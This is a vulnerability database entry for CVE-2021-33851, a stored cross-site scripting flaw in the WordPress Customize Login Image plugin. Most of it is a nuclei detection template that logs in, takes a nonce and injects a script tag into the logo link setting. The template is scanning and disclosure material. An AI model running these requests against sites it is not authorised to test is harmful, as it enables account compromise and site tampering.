Lucene search
K

WordPress Customize Login Image <3.5.3 - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

WordPress Customize Login Image <3.5.3 - Cross-Site Scripting vulnerability via custom logo link on Settings page. Update to 3.5.3

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress Plugin 跨站脚本漏洞
10 Mar 202200:00
cnnvd
CNVD
WordPress Customize Login Image Plugin Cross-Site Scripting Vulnerability
14 Mar 202200:00
cnvd
CVE
CVE-2021-33851
9 Mar 202216:54
cve
Cvelist
CVE-2021-33851
9 Mar 202216:54
cvelist
EUVD
EUVD-2021-20525
7 Oct 202500:30
euvd
NVD
CVE-2021-33851
10 Mar 202217:42
nvd
OSV
CVE-2021-33851
10 Mar 202217:42
osv
Patchstack
WordPress Customize Login Image plugin <= 3.5.2 - Stored Cross-Site Scripting (XSS) vulnerability
2 Dec 202100:00
patchstack
Prion
Cross site scripting
10 Mar 202217:42
prion
RedhatCVE
CVE-2021-33851
9 Jan 202611:27
redhatcve
Rows per page
id: CVE-2021-33851

info:
  name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
  author: 8authur
  severity: medium
  description: |
    WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
    - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
    - https://wordpress.org/plugins/customize-login-image/
    - https://nvd.nist.gov/vuln/detail/cve-2021-33851
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-33851
    cwe-id: CWE-79
    epss-score: 0.01318
    epss-percentile: 0.67376
    cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apasionados
    product: customize_login_image
    framework: wordpress
  tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_4 == 200'
          - 'contains(header_4, "text/html")'
          - 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
        internal: true
        part: body
# digest: 4b0a00483046022100eb5023087993560de2e4e86a4ee7a5b349255f8b816e43bccef789050f3eefb80221008a323ee8e3ce55924c4812d73885b869ee64af926edd8c0872c46784a3de7a76:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 23.5
CVSS 3.15.4
EPSS0.01318
25